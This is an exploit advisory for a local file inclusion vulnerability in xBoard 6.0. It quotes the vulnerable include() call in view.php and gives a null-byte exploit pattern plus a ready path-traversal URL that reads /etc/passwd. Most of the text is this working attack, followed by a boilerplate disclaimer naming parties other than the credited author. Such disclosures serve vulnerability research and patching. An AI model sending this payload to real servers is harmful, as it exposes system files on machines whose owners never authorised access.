##########################################
# Exploit Title: xBoard 6.0 Local File Inclusion
# Author: DaOne aka Mocking Bird
# Software Link: http://sourceforge.net/projects/xboard/
# Category: webapps/php
# Version: 6.0
# Google dork: N/A
# Tested on: Apache(CentOS) PHP/5.2.17
##########################################
Vulnerable code: view.php
27. if (file_exists("$directory/$post.html"))
28. {
29. include("$directory/$post.html");
Exploit
/view.php?post={localfile}{nullbyte}
http://{host}/xboard/view.php?post=../../../../../../../../../../etc/passwd
PoC>>http://oi45.tinypic.com/1z6h729.jpg
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information